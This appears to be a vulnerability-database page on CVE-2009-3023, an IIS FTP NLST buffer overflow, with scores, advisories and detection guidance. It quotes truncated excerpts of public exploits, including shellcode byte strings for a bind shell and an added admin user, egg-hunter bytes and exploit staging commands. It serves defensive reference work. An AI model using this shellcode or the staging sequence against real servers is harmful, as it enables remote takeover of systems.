CVE-2009-3023
published 2009-08-31CVE-2009-3023: Buffer overflow in the FTP Service in Microsoft Internet Information Services (IIS) 5.0 through 6.0 allows remote authenticated users to execute arbitrary code…
PriorityP275critical9CVSS 2.0
AVNACLAuSCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
90.91%
99.8th percentile
Buffer overflow in the FTP Service in Microsoft Internet Information Services (IIS) 5.0 through 6.0 allows remote authenticated users to execute arbitrary code via a crafted NLST (NAME LIST) command that uses wildcards, leading to memory corruption, aka "IIS FTP Service RCE and DoS Vulnerability."
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_information_server | 5.0 – 6.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0
bytes↗
\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38<egg>\x75\xF7\x40\x40\x40\x40\xFF\xE0
- →Detect exploit trigger: FTP NLST command with wildcard path traversal pattern matching '*/../' sent over an active FTP data channel after a CWD into a long directory path. ↗
- →Detect exploit staging: multiple FTP SITE commands carrying encoded shellcode (prefixed 'KSEXY') sent to store payload on the stack before the NLST trigger. ↗
- →Detect exploit staging: FTP MKD command creating a directory whose name begins with 'w00t' followed by a numeric port value, used to set up the long path required for the overflow. ↗
- →Detect egg-hunter signature bytes 0xB8 0x55 0x55 0x52 0x55 0x35 0x55 0x55 0x55 0x55 0x40 0x81 0x38 in FTP command payloads (SITE or MKD arguments) on port 21. ↗
- →Detect egg tag 'T00WT00W' in FTP PASS command or SITE command arguments, used as the egghunter marker for the secondary larger payload. ↗
- →The exploit requires the FTP server to allow write access; alert on anonymous FTP write access combined with MKD + SITE + NLST wildcard command sequences. ↗
- →Payload bad characters for this exploit are \x00\x09\x0c\x20\x0a\x0d\x0b; encoded shellcode in SITE/MKD arguments will avoid these bytes — use this constraint when writing YARA/Snort rules for payload detection. ↗
- ·The vulnerability only affects IIS FTP servers where the authenticated (or anonymous) user has write access to the filesystem; servers configured read-only are not exploitable via this vector. ↗
- ·IIS 6.0 is affected but has stack cookie (GS) protection, which complicates direct exploitation compared to IIS 5.0. ↗
- ·Return addresses in the public exploits are hardcoded for specific Windows 2000 SP levels and language versions (SP4 English/Italian, SP3 English, SP0-SP3 Japanese); detections based on these ROP gadget addresses are platform-specific. ↗
CVSS provenance
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck9.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-ww4p-6452-jmh8: Buffer overflow in the FTP Service in Microsoft Internet Information Services (IIS) 5
ghsa_unreviewed·2022-05-02
CVE-2009-3023 [HIGH] CWE-120 GHSA-ww4p-6452-jmh8: Buffer overflow in the FTP Service in Microsoft Internet Information Services (IIS) 5
Buffer overflow in the FTP Service in Microsoft Internet Information Services (IIS) 5.0 through 6.0 allows remote authenticated users to execute arbitrary code via a crafted NLST (NAME LIST) command that uses wildcards, leading to memory corruption, aka "IIS FTP Service RCE and DoS Vulnerability."
VulnCheck
Microsoft Internet Information Services (IIS) Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
vulncheck·2009·CVSS 9.0
CVE-2009-3023 [CRITICAL] Microsoft Internet Information Services (IIS) Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
Microsoft Internet Information Services (IIS) Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
Buffer overflow in the FTP Service in Microsoft Internet Information Services (IIS) 5.0 through 6.0 allows remote authenticated users to execute arbitrary code via a crafted NLST (NAME LIST) command that uses wildcards, leading to memory corruption, aka "IIS FTP Service RCE and DoS Vulnerability."
Affected: Microsoft Internet Information Services (IIS)
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://learn.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-053
No detection rules found.
Exploit-DB
Microsoft IIS FTP Server - NLST Response Overflow (MS09-053) (Metasploit)
exploitdb·2010-11-12
CVE-2009-3023 Microsoft IIS FTP Server - NLST Response Overflow (MS09-053) (Metasploit)
Microsoft IIS FTP Server - NLST Response Overflow (MS09-053) (Metasploit)
---
##
# $Id: ms09_053_ftpd_nlst.rb 11003 2010-11-12 06:19:49Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft IIS FTP Server NLST Response Overflow',
'Description' => %q{
This module exploits a stack buffer overflow flaw in the Microsoft IIS FTP
service. The flaw is triggered when a special NLST argument is passed
while the session has changed into a long directory path. For this exploit
to work, the FTP server must be configured to allow write access
Exploit-DB
Microsoft IIS 5.0 FTP Server (Windows 2000 SP4) - Remote Stack Overflow
exploitdb·2009-09-01
CVE-2009-3023 Microsoft IIS 5.0 FTP Server (Windows 2000 SP4) - Remote Stack Overflow
Microsoft IIS 5.0 FTP Server (Windows 2000 SP4) - Remote Stack Overflow
---
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444
# http://www.offensive-security.com/0day/msftp.pl.txt
use IO::Socket;
$|=1;
$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" .
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" .
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
"\x50\x38\x41\x43\x4a\x4a\x49\x45\x
Exploit-DB
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow
exploitdb·2009-08-31
CVE-2009-3023 Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow
---
# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x3
Metasploit
MS09-053 Microsoft IIS FTP Server NLST Response Overflow
metasploit
MS09-053 Microsoft IIS FTP Server NLST Response Overflow
MS09-053 Microsoft IIS FTP Server NLST Response Overflow
This module exploits a stack buffer overflow flaw in the Microsoft IIS FTP service. The flaw is triggered when a special NLST argument is passed while the session has changed into a long directory path. For this exploit to work, the FTP server must be configured to allow write access to the file system (either anonymously or in conjunction with a real account)
No writeups or analysis indexed.
http://support.microsoft.com/default.aspx?scid=kb%3B%5BLN%5D%3BQ975191http://www.exploit-db.com/exploits/9541http://www.exploit-db.com/exploits/9559http://www.kb.cert.org/vuls/id/276653http://www.securityfocus.com/bid/36189http://www.us-cert.gov/cas/techalerts/TA09-286A.htmlhttp://www.vupen.com/english/advisories/2009/2481https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-053https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6080http://support.microsoft.com/default.aspx?scid=kb%3B%5BLN%5D%3BQ975191http://www.exploit-db.com/exploits/9541http://www.exploit-db.com/exploits/9559http://www.kb.cert.org/vuls/id/276653http://www.securityfocus.com/bid/36189http://www.us-cert.gov/cas/techalerts/TA09-286A.htmlhttp://www.vupen.com/english/advisories/2009/2481https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-053https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6080
2009-08-31
Published
Exploited in the wild